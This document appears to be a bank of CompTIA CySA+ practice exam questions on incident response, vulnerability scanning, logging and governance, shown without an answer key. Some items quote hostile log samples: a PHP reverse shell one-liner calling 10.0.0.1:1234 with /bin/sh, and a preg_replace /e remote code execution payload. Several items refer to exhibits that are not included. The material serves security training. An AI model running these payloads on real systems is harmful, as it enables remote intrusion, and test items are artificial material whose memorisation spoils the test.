CYSA + 003 100 - 150

Description:
Practice Q&A

Creation Date: 2025/10/14

Category: Others

Number of questions: 51

Content:

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?. Scan the employee's computer with virus and malware tools. Review the actions taken by the employee and the email related to the event. Contact human resources and recommend the termination of the employee. Assign security awareness training to the employee involved in the incident.

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?. Code analysis. Static analysis. Reverse engineering. Fuzzing.

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mean time between queries is less than one second. • The average query length exceeds 100 characters. Which of the following attacks most likely occurred?. DNS exfiltration. DNS spoofing. DNS zone transfer. DNS poisoning.

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?. Corrective controls. Compensating controls. Operational controls. Administrative controls.

During the log analysis phase, the following suspicious command is detected: <?php preg_replace('/.*/e', 'system("ping -c 4 10.0.0.1");', ''); ?> Which of the following is being attempted?. Buffer overflow. RCE. ICMP tunneling. Smurf attack.

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?. DKIM. SPF. SMTP. DMARC.

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?. XDR logs. Firewall logs. IDS logs. MFA logs.

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?. To provide metrics and test continuity controls. To verify the roles of the incident response team. To provide recommendations for handling vulnerabilities. To perform tests against implemented security controls.

A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?. Perform non-credentialed scans. Ignore embedded web server ports. Create a tailored scan for the printer subnet. Increase the threshold length of the scan timeout.

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: • Must use minimal network bandwidth • Must use minimal host resources • Must provide accurate, near real-time updates • Must not have any stored credentials in configuration on the scanner Which of the following vulnerability scanning methods should be used to best meet these requirements?. Internal. Agent. Active. Uncredentialed.

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?. RFI. LFI. CSRF. XSS.

Which of the following does "federation" most likely refer to within the context of identity and access management?. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user. Correlating one's identity with the attributes and associated applications the user has access to.

Which of the following tools would work best to prevent the exposure of PII outside of an organization?. PAM. IDS. PKI. DLP.

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?. Hard disk. Primary boot partition. Malicious files. Routing table. Static IP address.

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.). SOAR. SIEM. MSP. NGFW. XDR. DLP.

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?. Hacktivist threat. Advanced persistent threat. Unintentional insider threat. Nation-state threat.

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?. A local red team member is enumerating the local RFC1918 segment to enumerate hosts. A threat actor has a foothold on the network and is sending out control beacons. An administrator executed a new database replication process without notifying the SOC. An insider threat actor is running Responder on the local segment, creating traffic replication.

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?. Cross-reference the signature with open-source threat intelligence. Configure the EDR to perform a full scan. Transfer the malware to a sandbox environment. Log in to the affected systems and run netstat.

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?. Log retention. Log rotation. Maximum log size. Threshold value.

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?. Risk register. Vulnerability assessment. Penetration test. Compliance report.

While reviewing web server logs, a security analyst discovers the following suspicious line: php -r '$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");' Which of the following is being attempted?. Remote file inclusion. Command injection. Server-side request forgery. Reverse shell.

Which of the following should be updated after a lessons-learned review?. Disaster recovery plan. Business continuity plan. Tabletop exercise. Incident response plan.

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?. Perform static analyses using an integrated development environment. Deploy compensating controls into the environment. Implement server-side logging and automatic updates. Conduct regular code reviews using OWASP best practices.

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?. OpenVAS. Angry IP Scanner. Wireshark. Maltego.

Which of the following security operations tasks are ideal for automation?. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number - Call the user to help with any questions about using the application. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine.

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?. Delivery. Reconnaissance. Exploitation. Weaponization.

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?. CIS Benchmarks. PCI DSS. OWASP Top Ten. ISO 27001.

A security analyst reviews the following Arachni scan results for a web application that stores PII data: Which of the following should be remediated first?. SQL injection. RFI. XSS. Code injection.

Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.). Executive management. Law enforcement. Marketing. Legal. Product owner. Systems administration.

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?. Enrich the SIEM-ingested data to include all data required for triage. Schedule a task to disable alerting when vulnerability scans are executing. Filter all alarms in the SIEM with low severity. Add a SOAR rule to drop irrelevant and duplicated notifications.

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?. The finding is a false positive and should be ignored. A rollback had been executed on the instance. The vulnerability scanner was configured without credentials. The vulnerability management software needs to be updated.

A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below: Which of the following systems should be prioritized for patching?. brown. grey. blane. sullivan.

During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be used for further analysis?. Fuzzing. Static analysis. Sandboxing. Packet capture.

A leader on the vulnerability management team is trying to reduce the team's workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first?. Assigning a custom recommendation for each finding. Analyzing false positives. Rendering an additional executive report. Regularly checking agent communication with the central console.

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?. PCI DSS. COBIT. ISO 27001. ITIL.

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?. PCI Security Standards Council. Local law enforcement. Federal law enforcement. Card issuer.

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?. Enabling a user account lockout after a limited number of failed attempts. Installing a third-party remote access tool and disabling RDP on all devices. Implementing a firewall block for the remote system's IP address. Increasing the verbosity of log-on event auditing on all devices.

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on its infected hosts, including deletion of the initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Choose two.). Creation time of dropper. Registry artifacts. EDR data. Prefetch files. File system metadata. Sysmon event log.

When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?. CASB. SASE. ZTNA. SWG.

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations should the security analyst provide to harden the web server?. Remove the version information on http-server-header. Disable tcp_wrappers. Delete the /wp-login.php folder. Close port 22.

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident?. Back up the configuration file for all network devices. Record and validate each connection. Create a full diagram of the network infrastructure. Take photos of the impacted items.

A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?. To identify regulatory compliance requirements. To facilitate the creation of DLP rules. To prioritize IT expenses. To establish the value of data to the organization.

A security analyst observed the following activity from a privileged account: • Accessing emails and sensitive information • Audit logs being modified • Abnormal log-in times Which of the following best describes the observed activity?. Irregular peer-to-peer communication. Unauthorized privileges. Rogue devices on the network. Insider attack.

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?. A vulnerability that has related threats and IoCs, targeting a different industry. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM. A vulnerability that has no adversaries using it or associated IoCs. A vulnerability that is related to an isolated system, with no IoCs.

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees the following: Which of the following are most likely occurring, based on the MFA logs? (Choose two.). Dictionary attack. Push phishing. Impossible geo-velocity. Subscriber identity module swapping. Rogue access point. Password spray.

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization’s network?. Utilize an RDP session on an unused workstation to evaluate the malware. Disconnect and utilize an existing infected asset off the network. Create a virtual host for testing on the security analyst workstation. Subscribe to an online service to create a sandbox environment.

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?. Mean time to detect. Number of exploits by tactic. Alert volume. Quantity of intrusion attempts.

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?. Review of security requirements. Compliance checks. Decomposing the application. Security by design.

Which of the following would an organization use to develop a business continuity plan?. A diagram of all systems and interdependent applications. A repository for all the software used by the organization. A prioritized list of critical systems defined by executive leadership. A configuration management database in print at an off-site location.

The management team requests monthly KPI reports on the company’s cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?. Employee turnover. Intrusion attempts. Mean time to detect. Level of preparedness.

Which of the following best describes the key elements of a successful information security program?. Business impact analysis, asset and change management, and security communication plan. Security policy implementation, assignment of roles and responsibilities, and information asset classification. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems.
